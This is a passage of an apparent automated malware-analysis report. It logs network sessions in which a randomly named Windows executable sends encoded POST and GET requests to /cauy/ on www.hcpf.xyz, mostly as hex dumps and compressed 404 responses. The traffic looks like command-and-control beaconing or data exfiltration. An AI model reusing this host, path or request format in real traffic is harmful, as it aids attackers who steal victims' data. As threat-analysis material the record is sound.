                                                                                              Data Ascii: 057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.05
                                                                                              Oct 8, 2024 05:29:24.716016054 CEST672INData Raw: 37 2e 35 33 20 37 2e 32 2d 34 39 2e 34 33 34 20 37 2e 37 36 2d 32 31 2e 39 30 34 2e 35 36 2d 33 38 2e 36 30 34 20 31 2e 30 31 32 2d 34 39 2e 38 34 33 2d 2e 34 36 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20
                                                                                              Data Ascii: 7.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.
                                                                                              Oct 8, 2024 05:29:24.716053009 CEST1236INData Raw: 37 37 2e 31 38 38 2d 2e 33 32 2e 34 30 37 2d 2e 36 32 39 2e 36 31 36 2d 2e 39 34 32 2e 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32
                                                                                              Data Ascii: 77.188-.32.407-.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1
                                                                                              Oct 8, 2024 05:29:24.716089010 CEST1236INData Raw: 35 36 39 63 2d 2e 34 34 2d 2e 34 37 33 2d 31 2e 37 31 33 2d 2e 37 31 32 2d 32 2e 37 32 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34
                                                                                              Data Ascii: 569c-.44-.473-1.713-.712-2.727-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.28
                                                                                              Oct 8, 2024 05:29:24.716120958 CEST448INData Raw: 34 32 2e 30 39 2d 2e 30 30 33 2e 30 33 37 2d 2e 31 35 34 2e 32 34 33 2e 36 32 32 2e 33 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e
                                                                                              Data Ascii: 42.09-.003.037-.154.243.622.357.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80
                                                                                              Oct 8, 2024 05:29:24.716157913 CEST1236INData Raw: 2d 2e 39 36 33 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38
                                                                                              Data Ascii: -.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.5
                                                                                              Oct 8, 2024 05:29:24.721084118 CEST1236INData Raw: 2d 2e 30 31 32 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38
                                                                                              Data Ascii: -.012.181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.450026104.21.48.76805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:29.779403925 CEST660OUTPOST /cauy/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.hcpf.xyz
                                                                                              Origin: http://www.hcpf.xyz
                                                                                              Referer: http://www.hcpf.xyz/cauy/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 43 77 37 39 78 70 33 76 56 43 56 4f 30 51 6f 67 64 47 47 6e 50 44 70 33 7a 4e 54 63 36 65 50 54 55 43 58 75 67 63 73 68 44 52 48 4b 34 6a 2b 2f 67 41 48 37 70 79 59 33 6b 54 62 58 46 79 76 71 52 38 34 50 49 34 5a 41 64 32 79 42 53 6d 79 6c 6b 45 62 74 61 4c 68 41 34 6b 59 4c 4f 46 38 6b 62 71 6b 43 79 4e 41 6f 36 57 50 6c 46 4a 63 72 5a 79 55 37 30 4c 75 62 38 65 36 61 48 44 46 41 65 75 6c 4b 78 68 73 72 63 76 56 2f 46 32 55 58 48 4c 77 4e 38 74 48 62 30 74 79 71 47 56 36 42 46 54 64 4a 58 4c 58 58 6f 4f 39 43 59 71 70 2b 36 7a 76 6d 6d 49 65 55 74 52 69 34 6d 4e 36 58 58 77 3d 3d
                                                                                              Data Ascii: FJiPC=Cw79xp3vVCVO0QogdGGnPDp3zNTc6ePTUCXugcshDRHK4j+/gAH7pyY3kTbXFyvqR84PI4ZAd2yBSmylkEbtaLhA4kYLOF8kbqkCyNAo6WPlFJcrZyU70Lub8e6aHDFAeulKxhsrcvV/F2UXHLwN8tHb0tyqGV6BFTdJXLXXoO9CYqp+6zvmmIeUtRi4mN6XXw==
                                                                                              Oct 8, 2024 05:29:30.489342928 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:30 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: ASP.NET
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JufiqQz%2B%2BBIxVBVYyNDMnR%2Bl4EjYFzf45Qv%2FyEXZSqI93ZuuoB5u3zD4%2BqzK2X2ofmx844dYLGqO6U3A%2BYY9fBxU9%2BS9FQK29Sj4z8wCpynCKIWw3h6hxGwfeKv5WK0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8cf30c039cc08c15-EWR
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd [TRUNCATED]
                                                                                              Data Ascii: 2c5|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(fnva8I-<3H]'Ab.`i+c,O.$CT}/$x`Q-hYD\tO=_GYb<<k V<67k'fMpI9]$o?|%4Ik*fMFa2tmQ4KCT?/7v
                                                                                              Oct 8, 2024 05:29:30.490151882 CEST72INData Raw: bd a3 b7 5b 7f d6 5f 0d 4e 77 7f ef f6 0f 7e 6d 1d f6 2e ce 3f 9f 7d 3a de d8 ec ed 1f bd 3f 88 29 4a b1 26 98 45 cd b4 67 76 98 78 fc 62 f5 7f 00 00 00 ff ff e3 e5 02 00 c1 3c 21 2f 8b 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: [_Nw~m.?}:?)J&Egvxb<!/0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.450027104.21.48.76805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:32.331582069 CEST680OUTPOST /cauy/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.hcpf.xyz
                                                                                              Origin: http://www.hcpf.xyz
                                                                                              Referer: http://www.hcpf.xyz/cauy/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 43 77 37 39 78 70 33 76 56 43 56 4f 79 44 77 67 52 46 75 6e 4a 6a 70 30 76 39 54 63 7a 2b 50 58 55 43 54 75 67 59 31 6b 44 43 6a 4b 34 43 69 2f 68 42 48 37 75 79 59 33 75 7a 62 57 4c 53 76 58 52 38 30 70 49 38 5a 41 64 32 32 42 53 6d 43 6c 6b 58 7a 69 62 62 68 43 68 30 59 46 4b 46 38 6b 62 71 6b 43 79 4e 55 47 36 57 58 6c 46 35 4d 72 4c 44 55 30 71 62 75 59 39 65 36 61 44 44 45 48 65 75 6c 6f 78 67 41 52 63 74 64 2f 46 33 6b 58 44 4b 77 4b 33 74 48 5a 70 64 7a 6f 4b 51 44 74 4b 32 6c 48 59 34 32 33 6c 2f 46 44 51 4d 34 6b 72 43 4f 78 30 49 36 6e 77 57 72 4d 72 4f 48 65 4d 37 63 77 77 65 5a 49 66 70 43 43 38 32 30 54 61 37 4d 6f 37 2b 59 3d
                                                                                              Data Ascii: FJiPC=Cw79xp3vVCVOyDwgRFunJjp0v9Tcz+PXUCTugY1kDCjK4Ci/hBH7uyY3uzbWLSvXR80pI8ZAd22BSmClkXzibbhCh0YFKF8kbqkCyNUG6WXlF5MrLDU0qbuY9e6aDDEHeuloxgARctd/F3kXDKwK3tHZpdzoKQDtK2lHY423l/FDQM4krCOx0I6nwWrMrOHeM7cwweZIfpCC820Ta7Mo7+Y=
                                                                                              Oct 8, 2024 05:29:33.128304005 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:33 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: ASP.NET
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lj1TVsBB7pN%2Fh1JShFXP%2FCAyK9t9BfgEsxZWf9dpBa7Ao4hRJjJXqPBhXCaE3JkcScsV%2Bri7Yg%2BQ1%2B6oAeduWxAavntVDUExeOf00w0dH0u9cyLhMO5kWT4JMGsQBoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8cf30c1388764303-EWR
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 62 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd [TRUNCATED]
                                                                                              Data Ascii: 2b9|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(fnva8I-<3H]'Ab.`i+c,O.$CT}/$x`Q-hYD\tO=_GYb<<k V<67k'fMpI9]$o?|%4Ik*fMFa2tmQ4KCT?/7v[
                                                                                              Oct 8, 2024 05:29:33.128710032 CEST73INData Raw: 7f d6 5f 0d 4e 77 7f ef f6 0f 7e 6d 1d f6 2e ce 3f 9f 7d 3a de d8 ec ed 1f bd 3f 88 29 4a b1 26 98 45 cd b4 67 76 98 78 fc 62 f5 7f 00 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c1 3c 21 2f 8b 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: _Nw~m.?}:?)J&Egvxbc<!/0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.450028104.21.48.76805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:34.880032063 CEST10762OUTPOST /cauy/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.hcpf.xyz
                                                                                              Origin: http://www.hcpf.xyz
                                                                                              Referer: http://www.hcpf.xyz/cauy/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 43 77 37 39 78 70 33 76 56 43 56 4f 79 44 77 67 52 46 75 6e 4a 6a 70 30 76 39 54 63 7a 2b 50 58 55 43 54 75 67 59 31 6b 44 43 72 4b 2f 77 47 2f 67 69 76 37 76 79 59 33 69 54 62 62 4c 53 76 47 52 34 59 74 49 38 63 37 64 77 71 42 54 45 4b 6c 31 53 50 69 55 62 68 43 70 55 59 45 4f 46 39 35 62 71 30 65 79 4e 45 47 36 57 58 6c 46 2f 49 72 62 43 55 30 74 72 75 62 38 65 36 4f 48 44 46 67 65 75 39 53 78 67 31 6d 64 5a 52 2f 45 58 30 58 42 59 49 4b 72 39 48 66 71 64 7a 4b 4b 51 48 79 4b 32 51 34 59 35 54 67 6c 2f 68 44 53 39 4d 35 7a 57 4b 4b 33 4c 62 2f 75 6b 50 53 7a 4f 33 46 41 72 4d 46 38 4d 5a 51 4c 39 65 31 78 47 73 59 66 36 45 4e 34 37 32 33 68 64 51 6a 34 47 78 77 6e 7a 74 34 47 79 47 44 4f 55 44 5a 4d 57 77 4e 4a 65 53 75 72 7a 53 5a 64 72 38 51 4a 2f 47 63 2f 6e 76 6f 63 58 69 63 55 35 4d 4a 59 46 38 76 2b 35 36 69 31 79 46 43 6c 66 56 45 63 32 76 30 2f 71 58 63 6f 45 6f 4c 31 35 61 4a 63 31 34 74 72 50 68 56 79 35 71 69 35 54 6e 69 6f 70 76 63 67 37 57 31 41 69 4d 63 43 6e 71 61 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=Cw79xp3vVCVOyDwgRFunJjp0v9Tcz+PXUCTugY1kDCrK/wG/giv7vyY3iTbbLSvGR4YtI8c7dwqBTEKl1SPiUbhCpUYEOF95bq0eyNEG6WXlF/IrbCU0trub8e6OHDFgeu9Sxg1mdZR/EX0XBYIKr9HfqdzKKQHyK2Q4Y5Tgl/hDS9M5zWKK3Lb/ukPSzO3FArMF8MZQL9e1xGsYf6EN4723hdQj4Gxwnzt4GyGDOUDZMWwNJeSurzSZdr8QJ/Gc/nvocXicU5MJYF8v+56i1yFClfVEc2v0/qXcoEoL15aJc14trPhVy5qi5Tniopvcg7W1AiMcCnqapkYiI3Hr9ZzHBCGGx5Q19nt+9BwMdDd/K9xZxfRxDCXycDZ4GGhFLiW2Cg2JT5t1kpV8RX0/DZxzNhQt8Cz66ghyRzvWpqo7Xkz+st2ziUqT/Za2JM8JObC0dEX2AItr3JhPqmVytGfZdawnMiM2LC/mMsLcMy5ZZOSS7TSsaXs/K4uVuEBIe2y1243eIdfOQfMZ1xmrqsBPb/399YfxK9+jf0Cd/FyC0rEnIO5JxkEPxMW8MXSriVQ1343kCglQnjX+ll6dg64L7OzsdQyxD3k2BlNvoDK1t1dLRV/YwXO+JtvqRyrD6zPtmaRHGMxXbbVduaebBixBjg6I04XN/hhuJH0+PUQMztXzGhYnitw+Jznd36c06cCncg3b3tXJihzGWr0ZJ5aoA9PSCSmnxRG7WTaXuKbNIJS5qkuu0OGz2rLqJBXAs2zyPP56vIOnVrk42Y4UY5OCdokafn9G8wBBvRhhZo//dUvGDSrMLTVMG12kotXNgQzeze7CmGMwrjzeymUcEj1IDaPhUo6ca0Zw0tK4SR1VuwOa4r+KNu68fKmkClgGlMCXvXD7BS9GyUEOo15Vh7xspchqlXD1okpUaVl3+lwPsjODcQB8qt1WnKMVVbY9SBLNTKAAD7cNXMzvNCgGD/fh6ccsEFrh7lVrfAidNblx4u [TRUNCATED]
                                                                                              Oct 8, 2024 05:29:35.587308884 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:35 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: ASP.NET
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pe0vV23V7f0Q83%2FSYJi1S1IThl7f7e6Q3D75Q68%2B03TPEfSBGUkFbhQ%2FzK8gBYr5tCvP2Qv6ckTEyXk921BB4C8DLOW%2FVXY%2Bp4bPkPTRbAo%2FfHbgf%2BfneTy0hUAgcU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8cf30c237cd07d11-EWR
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd [TRUNCATED]
                                                                                              Data Ascii: 2c5|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(fnva8I-<3H]'Ab.`i+c,O.$CT}/$x`Q-hYD\tO=_GYb<<k V<67k'fMpI9]$o?|%4Ik*fMFa2tmQ4KCT?/7v
                                                                                              Oct 8, 2024 05:29:35.587558031 CEST72INData Raw: bd a3 b7 5b 7f d6 5f 0d 4e 77 7f ef f6 0f 7e 6d 1d f6 2e ce 3f 9f 7d 3a de d8 ec ed 1f bd 3f 88 29 4a b1 26 98 45 cd b4 67 76 98 78 fc 62 f5 7f 00 00 00 ff ff e3 e5 02 00 c1 3c 21 2f 8b 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: [_Nw~m.?}:?)J&Egvxb<!/0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.450029104.21.48.76805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:29:37.429049015 CEST400OUTGET /cauy/?2FO=QBbT1R8&FJiPC=PyTdyf7MBTV+gxszcm/SLHpt+YfE++r+U3XVnpxfSjDO6QTtkkjvi3Yn5wnWcyf5TfAKBJM6K26qTiz5xiPid6ZOvGIKLUwhcowB8dEz9H7fOuc+NjQG9Jg= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.hcpf.xyz
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:29:38.171293020 CEST1236INHTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 03:29:38 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: ASP.NET
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMrHUspr2hsUCkRDs0mgJBdzC3sodFdFi4L0CTBxbY2jm5bV4GB0IKIoPz%2B94wFU5g4ADUu5ht7uhIx%2Bj%2BntGsS0MHGqLJ3EAeimA9mgx2XQH%2B6lpuxGi0y33vB4CTQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8cf30c339e690f80-EWR
                                                                                              Data Raw: 34 38 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 [TRUNCATED]
                                                                                              Data Ascii: 48b<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6
